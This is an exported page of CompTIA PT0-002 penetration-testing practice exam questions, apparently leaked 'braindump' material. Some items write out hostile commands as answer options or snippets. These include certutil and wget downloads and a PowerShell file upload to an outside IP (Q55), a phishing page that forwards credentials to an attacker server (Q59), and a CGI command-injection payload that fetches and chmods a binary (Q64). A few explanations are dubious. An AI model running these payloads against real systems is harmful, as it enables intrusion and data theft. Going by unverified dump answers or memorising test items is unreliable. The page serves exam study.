This page was exported from Exam for engine [ http://blog.test4engine.com ] Export date:Mon Nov 18 2:27:54 2024 / +0000 GMT ___________________________________________________ Title: CompTIA PT0-002 Real 2024 Braindumps Mock Exam Dumps [Q51-Q69] --------------------------------------------------- CompTIA PT0-002 Real 2024 Braindumps Mock Exam Dumps PT0-002 Exam Questions | Real PT0-002 Practice Dumps NO.51 A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?  Run an application vulnerability scan and then identify the TCP ports used by the application.  Run the application attached to a debugger and then review the application’s log.  Disassemble the binary code and then identify the break points.  Start a packet capture with Wireshark and then run the application. NO.52 A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?  OWASP Top 10  MITRE ATT&CK framework  NIST Cybersecurity Framework  The Diamond Model of Intrusion Analysis NO.53 A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)  Telnet  HTTP  SMTP  DNS  NTP  SNMP NO.54 A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?  To meet PCI DSS testing requirements  For testing of the customer’s SLA with the ISP  Because of concerns regarding bandwidth limitations  To ensure someone is available if something goes wrong NO.55 A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?  certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe  powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)  schtasks /query /fo LIST /v | find /I “Next Run Time:”  wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/— https://docs.microsoft.com/en-us/sysinternals/downloads/accesschkNO.56 A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant.The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?  PLCs will not act upon commands injected over the network.  Supervisors and controllers are on a separate virtual network by default.  Controllers will not validate the origin of commands.  Supervisory systems will detect a malicious injection of code/commands. NO.57 A penetration tester conducts an Nmap scan against a target and receives the following results:Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?  Nessus  ProxyChains  OWASPZAP  Empire NO.58 A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?  Add a dependency checker into the tool chain.  Perform routine static and dynamic analysis of committed code.  Validate API security settings before deployment.  Perform fuzz testing of compiled binaries. NO.59 For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link tohttps://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:Which of the following lines of code should the security engineer add to make the attack successful?  window.location.= ‘https://evilcorp.com’  crossDomain: true  geturlparameter (‘username’)  redirectUrl = ‘https://example.com’ NO.60 A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?  Alternate data streams  PowerShell modules  MP4 steganography  PsExec Explanation“Windows Management Instrumentation (WMI) is a subsystem of PowerShell that gives admins access to powerful system monitoring tools.”NO.61 Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?  S/MIME  FTPS  DNSSEC  AS2 ExplanationS/MIME stands for Secure/Multipurpose Internet Mail Extensions and is a standard for encrypting and signing email messages. It uses public key cryptography to ensure the confidentiality, integrity, and authenticity of email communications. FTPS is a protocol for transferring files securely over SSL/TLS, but it is not used for emailing. DNSSEC is a protocol for securing DNS records, but it does not protect email content. AS2 is a protocol for exchanging business documents over HTTP/S, but it is not used for emailing.NO.62 Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?  The IP address is wrong.  The server is unreachable.  The IP address is on the blocklist.  The IP address is on the allow list. ExplanationThe most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.NO.63 You are a penetration tester reviewing a client’s website through a web browser.INSTRUCTIONSReview all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. NO.64 A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:exploit = “POST “exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS&loginUser=a&Pwd=a”exploit += “HTTP/1.1”Which of the following commands should the penetration tester run post-engagement?  grep -v apache ~/.bash_history > ~/.bash_history  rm -rf /tmp/apache  chmod 600 /tmp/apache  taskkill /IM “apache” /F NO.65 You are a penetration tester running port scans on a server.INSTRUCTIONSPart 1: Given the output, construct the command that was used to generate this output from the available options.Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. See explanation below.ExplanationPart 1 – 192.168.2.2 -O -sV –top-ports=100 and SMB vulnsPart 2 – Weak SMB file permissionshttps://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprintingNO.66 Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?  Whether the cloud service provider allows the penetration tester to test the environment  Whether the specific cloud services are being used by the application  The geographical location where the cloud services are running  Whether the country where the cloud service is based has any impeding laws ExplanationThe first thing that a penetration tester should consider when engaging in a penetration test in a cloud environment is whether the cloud service provider allows the tester to test the environment, as this will determine whether the tester has permission or authorization to perform the test. Some cloud service providers have policies or terms of service that prohibit or restrict penetration testing on their platforms or require prior approval or notification before testing. The tester should review these policies and obtain written consent from the provider before conducting any testing activities.NO.67 A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?  Send deauthentication frames to the stations.  Perform jamming on all 2.4GHz and 5GHz channels.  Set the malicious AP to broadcast within dynamic frequency selection channels.  Modify the malicious AP configuration to not use a pre-shared key. NO.68 An Nmap scan of a network switch reveals the following:Which of the following technical controls will most likely be the FIRST recommendation for this device?  Encrypted passwords  System-hardening techniques  Multifactor authentication  Network segmentation NO.69 Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?  Scraping social media for personal details  Registering domain names that are similar to the target company’s  Identifying technical contacts at the company  Crawling the company’s website for company information ExplanationScraping social media for personal details can help a penetration tester craft personalized and convincing social engineering attacks against top-level executives, who may share sensitive or confidential information on their profiles. Registering domain names that are similar to the target company’s can be used for phishing or typosquatting attacks, but not specifically against executives. Identifying technical contacts at the company can help with reconnaissance, but not with social engineering. Crawling the company’s website for company information can provide general background knowledge, but not specific details about executives. Loading … CompTIA PT0-002 exam is a challenging and comprehensive certification program designed to assess your skills in performing penetration testing, identifying vulnerabilities, and mitigating security risks. It's a valuable certification for cybersecurity professionals who want to enhance their skills and expertise while demonstrating their knowledge of key cybersecurity concepts and methodologies. If you're considering a career in cybersecurity or looking to take your skills to the next level, the CompTIA PT0-002 certification is an excellent way to demonstrate your capabilities and stand out in the job market.   Verified PT0-002 Exam Dumps Q&As - Provide PT0-002 with Correct Answers: https://www.test4engine.com/PT0-002_exam-latest-braindumps.html --------------------------------------------------- Images: https://blog.test4engine.com/wp-content/plugins/watu/loading.gif https://blog.test4engine.com/wp-content/plugins/watu/loading.gif --------------------------------------------------- --------------------------------------------------- Post date: 2024-01-05 16:21:56 Post date GMT: 2024-01-05 16:21:56 Post modified date: 2024-01-05 16:21:56 Post modified date GMT: 2024-01-05 16:21:56